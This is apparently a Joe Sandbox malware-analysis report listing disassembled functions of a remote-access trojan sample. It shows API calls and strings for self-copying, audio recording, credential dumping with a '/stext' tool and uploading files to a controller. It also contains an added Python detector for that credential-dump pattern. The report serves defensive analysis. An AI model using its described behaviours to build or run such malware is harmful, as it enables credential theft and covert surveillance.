                                                          • Opcode ID: db40e97701d6933eb01dc6137a2f1fe71b6556f31fe51939fd8c3e0f7f5558e8
                                                          • Instruction ID: 17001e37a1d7cf9a3413e78a7a022695eb621cd558d1591dce66fb7483b9d66c
                                                          • Opcode Fuzzy Hash: db40e97701d6933eb01dc6137a2f1fe71b6556f31fe51939fd8c3e0f7f5558e8
                                                          • Instruction Fuzzy Hash: 7551B571A00315BBDB00A7A09C46EFE736E9B44715F10416BF906B71E2EF788E858A9D
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A4A8
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A4BC
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00466554), ref: 0041A4E4
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041A4F5
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A536
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A54E
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A563
                                                          • SetEvent.KERNEL32 ref: 0041A580
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A591
                                                          • CloseHandle.KERNEL32 ref: 0041A5A1
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A5C3
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A5CD
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $TeF$close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                          • API String ID: 738084811-3504112074
                                                          • Opcode ID: 487eb8d61853791132be4fc542b0a4356c39d735bd1ee74e7e5f7e21231ae993
                                                          • Instruction ID: 23b594f260307180257043fa1e2d6aa1707bafa700398656917524c484c431be
                                                          • Opcode Fuzzy Hash: 487eb8d61853791132be4fc542b0a4356c39d735bd1ee74e7e5f7e21231ae993
                                                          • Instruction Fuzzy Hash: A251B1716442046AD214BB32EC92EBF3B9DAB90758F10443FF445621E2EE789D48866F
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040BC75
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750FC,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750FC,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                          • _wcslen.LIBCMT ref: 0040BD54
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000000,00000000), ref: 0040BDF2
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                          • _wcslen.LIBCMT ref: 0040BE34
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750FC,0000000E), ref: 0040BE9B
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000001), ref: 0040BEB9
                                                          • ExitProcess.KERNEL32 ref: 0040BED0
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: SG$ SG$ SG$ SG$ SG$6$C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$del$open
                                                          • API String ID: 1579085052-2918249962
                                                          • Opcode ID: 0585f1678bb5d4e8e7e6530c04c4a9b567f933f53f733ffc91d09e89a9b2ad51
                                                          • Instruction ID: cada26950b0f91ffbe9684419e497f708478a0192fdd3dd39558b78de3226dfb
                                                          • Opcode Fuzzy Hash: 0585f1678bb5d4e8e7e6530c04c4a9b567f933f53f733ffc91d09e89a9b2ad51
                                                          • Instruction Fuzzy Hash: 0B51C1316046006BD609B722EC52E7F77889F81719F50443FF985A62E2DF7CAD4582EE
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                          • WriteFile.KERNEL32(00000000,00472B02,00000002,00000000,00000000), ref: 00401CE0
                                                          • WriteFile.KERNEL32(00000000,00472B04,00000004,00000000,00000000), ref: 00401CF0
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                          • WriteFile.KERNEL32(00000000,00472B0E,00000002,00000000,00000000), ref: 00401D22
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: d86e0a11b62900f44300c56c570c8f4c6d29e182ebfed168058ac3948617b838
                                                          • Instruction ID: 459023fa40bd80d73c97eac26e4027242e7445eca248bff5dcea5bec94493f3f
                                                          • Opcode Fuzzy Hash: d86e0a11b62900f44300c56c570c8f4c6d29e182ebfed168058ac3948617b838
                                                          • Instruction Fuzzy Hash: 85411C726443187AE210DE51DD86FBB7FACEB85B54F40081AF644E6080D7A5E909DBB3
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000001,004068B2,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000003,004068DA,004752F0,00406933), ref: 004064F4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-2606053238
                                                          • Opcode ID: ef23c6471a2b46cbb5b12a679159521cca5d22753a6c35f36816646c352fbe50
                                                          • Instruction ID: d8392adca69ca7380431791802c09c3f057f20abbaf47be00649cb9a46baa942
                                                          • Opcode Fuzzy Hash: ef23c6471a2b46cbb5b12a679159521cca5d22753a6c35f36816646c352fbe50
                                                          • Instruction Fuzzy Hash: D20171A4E40B1635CB206F7B7C94D17AEAC9E503503160837A406F32A1EEBCD400CD7D
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041B3E1
                                                          • _memcmp.LIBVCRUNTIME ref: 0041B3F9
                                                          • lstrlenW.KERNEL32(?), ref: 0041B412
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B44D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B460
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B4A4
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041B4BF
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B4D7
                                                          • _wcslen.LIBCMT ref: 0041B4E6
                                                          • FindVolumeClose.KERNEL32(?), ref: 0041B506
                                                          • GetLastError.KERNEL32 ref: 0041B51E
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B54B
                                                          • lstrcatW.KERNEL32(?,?), ref: 0041B564
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041B573
                                                          • GetLastError.KERNEL32 ref: 0041B57B
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: ab6c0a2e820866b083e3708fbad612f297667e297ed8968616fd37775c99846c
                                                          • Instruction ID: f0577cbf519c1fbc76aa3138d797bbd7c283cc622b072e5c2a83b2d98bec9820
                                                          • Opcode Fuzzy Hash: ab6c0a2e820866b083e3708fbad612f297667e297ed8968616fd37775c99846c
                                                          • Instruction Fuzzy Hash: 8441A071504705ABC720DF61E8489EBB7E8EB48705F00482FF541D2262EF78D989CBDA
                                                          APIs
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          • Opcode ID: 0e1a8f8bbfaf70a5321281e28d07a2b80f4a7f922fdb1718459ded84c8fb4435
                                                          • Instruction ID: a8aac0df7486383d9a181904d39d16e24afc3d72eb934652fe50c6e09291e228
                                                          • Opcode Fuzzy Hash: 0e1a8f8bbfaf70a5321281e28d07a2b80f4a7f922fdb1718459ded84c8fb4435
                                                          • Instruction Fuzzy Hash: 5DD12771D00310AFFB21AF77888166E7BA4BF01368F45416FF945A7381EA399E418B9D
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411D72
                                                            • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00466324), ref: 004178B2
                                                            • Part of subcall function 0041789C: CloseHandle.KERNEL32($cF,?,?,00403AB9,00466324), ref: 004178BB
                                                          • Sleep.KERNEL32(0000000A,00466324), ref: 00411EC4
                                                          • Sleep.KERNEL32(0000000A,00466324,00466324), ref: 00411F66
                                                          • Sleep.KERNEL32(0000000A,00466324,00466324,00466324), ref: 00412008
                                                          • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 00412069
                                                          • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 004120A0
                                                          • DeleteFileW.KERNEL32(00000000,00466324,00466324,00466324), ref: 004120DC
                                                          • Sleep.KERNEL32(000001F4,00466324,00466324,00466324), ref: 004120F6
                                                          • Sleep.KERNEL32(00000064), ref: 00412138
                                                            • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                          • String ID: /stext "$HTG$HTG$NG$NG
                                                          • API String ID: 1223786279-556891652
                                                          • Opcode ID: dc2d48520b73d896eeb902e8487fecec8a65e375c022621813084e4261d1f7f8
                                                          • Instruction ID: b666a026b41db1aee680f36e7b950d376c2ae40a85d54f66cdb5da2431d4b1f1
                                                          • Opcode Fuzzy Hash: dc2d48520b73d896eeb902e8487fecec8a65e375c022621813084e4261d1f7f8
                                                          • Instruction Fuzzy Hash: F00224315083414AD324FB61D891BEFB7D5AFD4308F50493EF88A931E2EF785A49C69A
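The function above carries the string `/stext "` and chains GetModuleFileNameW, three Sleep/DeleteFileW pairs and a send() in a subcall. `/stext <file>` is the NirSoft "save as text" switch of the password-recovery utilities, so the sequence reads as: run an embedded recovery tool with `/stext`, wait, read the text dump, delete it, send the contents to the controller. The Python below is an added example, not code from this Joe Sandbox report or from the sample: it flags that invocation in process-creation events. The event layout (Sysmon-style ProcessId, Image, ParentImage, CommandLine fields) and the sample events are constructed assumptions for illustration.

```python
"""Flag '/stext <file>' password-recovery invocations in process-creation events.

Added example for the function above; not code from the Joe Sandbox report or
from the analysed sample. Event layout (Sysmon-style ProcessId, Image,
ParentImage, CommandLine) and the sample events are constructed assumptions.
"""
import re
from dataclasses import dataclass

# '/stext <path>' is the NirSoft 'save as text' switch. The analysed function
# holds the string '/stext "' and follows the call with Sleep and DeleteFileW,
# i.e. run the tool, wait, read the text dump, delete it, send the contents.
# The quoted alternative keeps paths with spaces intact.
STEXT_RE = re.compile(r'(?i)(?:^|\s)/stext\s+(?:"([^"]+)"|(\S+))')
TEMP_DIR_RE = re.compile(r'(?i)\\temp\\')


@dataclass
class Finding:
    pid: int
    parent_image: str
    output_path: str
    reason: str


def find_stext_dumps(events):
    """Return one Finding per event whose command line carries /stext.

    'temp-output' marks a dump written under a Temp directory, which is
    where a RAT-spawned recovery tool leaves it for pick-up and deletion;
    'stext-switch' is any other use of the switch (lower priority, still
    worth a look: the tools are legitimate but rarely run unattended).
    """
    findings = []
    for ev in events:
        m = STEXT_RE.search(ev.get("CommandLine", ""))
        if not m:
            continue
        out = m.group(1) or m.group(2)
        reason = "temp-output" if TEMP_DIR_RE.search(out) else "stext-switch"
        findings.append(Finding(ev["ProcessId"], ev.get("ParentImage", ""), out, reason))
    return findings


# Constructed events, not taken from the report; paths are illustrative.
SAMPLE_EVENTS = [
    {"ProcessId": 4120,
     "Image": r"C:\Users\u\AppData\Local\Temp\a.exe",
     "ParentImage": r"C:\Users\u\AppData\Roaming\svc\svc.exe",
     "CommandLine": r'"C:\Users\u\AppData\Local\Temp\a.exe" /stext "C:\Users\u\AppData\Local\Temp\out 1.txt"'},
    {"ProcessId": 4130,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
    {"ProcessId": 4140,
     "Image": r"C:\Tools\mailpv.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mailpv.exe /stext C:\Tools\mail.txt"},
]

if __name__ == "__main__":
    for f in find_stext_dumps(SAMPLE_EVENTS):
        print(f"pid={f.pid} parent={f.parent_image} output={f.output_path} [{f.reason}]")
```

A real hunt would join the finding with a later FileDelete event for the same output path and with an outbound connection from the parent, which is exactly the Sleep/DeleteFileW/send order the function shows.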
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CCF4
                                                          • GetCursorPos.USER32(?), ref: 0041CD03
                                                          • SetForegroundWindow.USER32(?), ref: 0041CD0C
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CD26
                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B50), ref: 0041CD77
                                                          • ExitProcess.KERNEL32 ref: 0041CD7F
                                                          • CreatePopupMenu.USER32 ref: 0041CD85
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CD9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: bed582d39fc96e8479943e4d89b527f8ff9ef20370aed2009df63d45acb158b0
                                                          • Instruction ID: 460fc807693895ecf387abb2373bcbc61375cccb84b7011694e880842115b21a
                                                          • Opcode Fuzzy Hash: bed582d39fc96e8479943e4d89b527f8ff9ef20370aed2009df63d45acb158b0
                                                          • Instruction Fuzzy Hash: F321F831140205EFDB054FA4FD4DBAA3F65EB04702F004539FA0AA41B1DBB6ED91EB59
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: 39c5139744f4540f523a9af4ed2fa8afb712fe0565144d4bd577e3f50ea1b080
                                                          • Instruction ID: de18a1b700a064f56ed707831433d851a0809218b1b1d193042f08ca5b0df7c8
                                                          • Opcode Fuzzy Hash: 39c5139744f4540f523a9af4ed2fa8afb712fe0565144d4bd577e3f50ea1b080
                                                          • Instruction Fuzzy Hash: 59B190719006059FEF11DF69C881BEEBBF4FF09304F14406EF895AB252DA799C459B24
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                          • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                          • __aulldiv.LIBCMT ref: 00407FE9
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                          • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                          • API String ID: 1884690901-2582957567
                                                          • Opcode ID: 51cee8c69b7389e8a28f069381dc337d69fe878f182ed45289c66d2e756e5a1e
                                                          • Instruction ID: fe8c5194ffe86d3827a7b181bfbb3d0fd3c62202293e6b84b2d5449ede98e066
                                                          • Opcode Fuzzy Hash: 51cee8c69b7389e8a28f069381dc337d69fe878f182ed45289c66d2e756e5a1e
                                                          • Instruction Fuzzy Hash: 73B182716083409BC614FB25C892BAFB7E5AFD4314F40492EF889632D2EF789945C79B
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413F5E
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413FA0
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413FC0
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413FC7
                                                          • LoadLibraryA.KERNEL32(?), ref: 00413FFF
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414011
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414018
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414027
                                                          • FreeLibrary.KERNEL32(00000000), ref: 0041403E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$getaddrinfo
                                                          • API String ID: 2490988753-3078833738
                                                          • Opcode ID: a1ebb0e7ad90273c6050595515f5be941597b1bff8e5ee6fc120c50391cee153
                                                          • Instruction ID: be6955175b5ce73d91635d8a52bfbd354ab09fdd92d7e760b1966c561f7cb5d0
                                                          • Opcode Fuzzy Hash: a1ebb0e7ad90273c6050595515f5be941597b1bff8e5ee6fc120c50391cee153
                                                          • Instruction Fuzzy Hash: B33117B280131567D320EF55DC84EDB7BDCAF89745F01092AFA88A3201D73CD98587AE
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 004502C1
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F510
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F522
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F534
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F546
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F558
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F56A
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F57C
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F58E
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5A0
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5B2
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5C4
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5D6
                                                            • Part of subcall function 0044F4F3: _free.LIBCMT ref: 0044F5E8
                                                          • _free.LIBCMT ref: 004502B6
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 004502D8
                                                          • _free.LIBCMT ref: 004502ED
                                                          • _free.LIBCMT ref: 004502F8
                                                          • _free.LIBCMT ref: 0045031A
                                                          • _free.LIBCMT ref: 0045032D
                                                          • _free.LIBCMT ref: 0045033B
                                                          • _free.LIBCMT ref: 00450346
                                                          • _free.LIBCMT ref: 0045037E
                                                          • _free.LIBCMT ref: 00450385
                                                          • _free.LIBCMT ref: 004503A2
                                                          • _free.LIBCMT ref: 004503BA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 0aefceb04b648aea5efd53e91dec8318d050154b6956abd82aee10787160205d
                                                          • Instruction ID: 8d5a52dc196ca223d521196e0170462af54da78aea2ffa7a7b46d1c1532e12ca
                                                          • Opcode Fuzzy Hash: 0aefceb04b648aea5efd53e91dec8318d050154b6956abd82aee10787160205d
                                                          • Instruction Fuzzy Hash: 57316F355003009FEB20AA79D84AB5B73E9EF01365F51445FF88AD7652DF38AC48D719
                                                          APIs
                                                            • Part of subcall function 00411771: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E748), ref: 00411781
                                                            • Part of subcall function 00411771: WaitForSingleObject.KERNEL32(000000FF), ref: 00411794
                                                            • Part of subcall function 00412735: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475308), ref: 00412751
                                                            • Part of subcall function 00412735: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041276A
                                                            • Part of subcall function 00412735: RegCloseKey.KERNEL32(00000000), ref: 00412775
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466900,00466900,00000000), ref: 0040C826
                                                          • ExitProcess.KERNEL32 ref: 0040C832
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                           • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmp
